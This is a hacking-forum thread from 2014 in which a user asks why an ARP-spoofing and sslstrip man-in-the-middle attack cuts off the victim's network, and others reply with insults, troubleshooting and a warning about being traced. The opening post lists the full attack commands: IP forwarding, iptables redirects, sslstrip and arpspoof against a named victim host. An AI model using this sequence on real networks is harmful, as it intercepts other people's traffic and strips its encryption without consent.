Author Topic: problem with arpspoof and sslstrip  (Read 1787 times)

0 Members and 1 Guest are viewing this topic.

Offline Ming

  • /dev/null
  • *
  • Posts: 8
  • Cookies: 0
    • View Profile
problem with arpspoof and sslstrip
« on: April 06, 2014, 09:23:43 pm »
hello evilzone, I need help with the mitm attack, i don't know why, when i run sslstrip and arpspoof I get http data sending from victim to server(sslstrip and wireshark), but network of victim is completely down

my commands:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 4444
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 4444
sslstrip -a -l 4444
arpspoof -i wlan0 -r 192.168.0.1 -t 192.168.0.12

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: problem with arpspoof and sslstrip
« Reply #1 on: April 07, 2014, 01:29:31 am »
You need help with basic networking and debugging of problems.
Something say's that you are not ready for thing like this :)

Show us the 'victims'  ARP table.
« Last Edit: April 07, 2014, 01:29:49 am by proxx »
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline Ming

  • /dev/null
  • *
  • Posts: 8
  • Cookies: 0
    • View Profile
Re: problem with arpspoof and sslstrip
« Reply #2 on: April 07, 2014, 11:47:14 pm »
it is possible using my computer?

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
Re: problem with arpspoof and sslstrip
« Reply #3 on: April 08, 2014, 12:19:32 am »
The computer's capable, but your brain on the otherhand...
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: problem with arpspoof and sslstrip
« Reply #4 on: April 08, 2014, 07:24:52 am »
it is possible using my computer?
*facepalm
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline Ming

  • /dev/null
  • *
  • Posts: 8
  • Cookies: 0
    • View Profile
Re: problem with arpspoof and sslstrip
« Reply #5 on: April 08, 2014, 06:10:45 pm »
# arp -a 
Code: [Select]
? (192.168.0.1) at [*] [ether] on wlan0
I don't know if it's it
« Last Edit: April 08, 2014, 06:26:11 pm by Ming »

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: problem with arpspoof and sslstrip
« Reply #6 on: April 08, 2014, 06:28:20 pm »
# arp -a 
Code: [Select]
? (192.168.0.1) at [*] [ether] on wlan0
I don't know whether it's it
Coz Im in a good mood;
What is your attacking machine's MAC address?
What you want to see is that the network gateway is spoofed by the MAC of the attacker and not the original one.
Show us a before and after view of the ARP cache.
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline Ming

  • /dev/null
  • *
  • Posts: 8
  • Cookies: 0
    • View Profile
Re: problem with arpspoof and sslstrip
« Reply #7 on: April 09, 2014, 08:03:07 pm »
I think it is some security problem, because in another network this same work great, and I think that when I get data from my victims,mac is spoofed, this might be also sslstrip fault, i'm spoofing mac only for one laptop of my victim, and i can't show us what is going on in his notebook, what my computer see is less important

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: problem with arpspoof and sslstrip
« Reply #8 on: April 09, 2014, 10:44:16 pm »
I think it is some security problem, because in another network this same work great, and I think that when I get data from my victims,mac is spoofed, this might be also sslstrip fault, i'm spoofing mac only for one laptop of my victim, and i can't show us what is going on in his notebook, what my computer see is less important
You are not spoofing MAC addresses at all, you have any clue how ARP poisoning works ?
And if so please explain me the corrolation with spoofing MAC's.
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline ShadowPaw

  • /dev/null
  • *
  • Posts: 6
  • Cookies: -1
    • View Profile
Re: problem with arpspoof and sslstrip
« Reply #9 on: April 25, 2014, 03:23:43 am »
it is possible using my computer?


Make friends with the beast inside oneself, and that means not the beast but the shadow. The dark side of one's nature.

Offline Architect

  • Sir
  • ***
  • Posts: 428
  • Cookies: 56
  • STFU
    • View Profile
    • Rootd IRC
Re: problem with arpspoof and sslstrip
« Reply #10 on: April 25, 2014, 10:28:30 pm »
I hate to be the one to tell you but ARP spoofing is not at the computer, it's done at the router. And you should use a strong wireless card for it. And you should know what you're doing because this attack is easily traced by.. anybody. SSLSTRIP will get you a lot of time if you fuck it up and someone notices. Got to do some research next time, eg RTFM.

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: problem with arpspoof and sslstrip
« Reply #11 on: April 26, 2014, 02:15:25 pm »
I hate to be the one to tell you but ARP spoofing is not at the computer, it's done at the router. And you should use a strong wireless card for it. And you should know what you're doing because this attack is easily traced by.. anybody. SSLSTRIP will get you a lot of time if you fuck it up and someone notices. Got to do some research next time, eg RTFM.
It is actually at the computer, the arp table that maps MAC addresses to IP addresses is modified.
Not that you dont know that :)
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage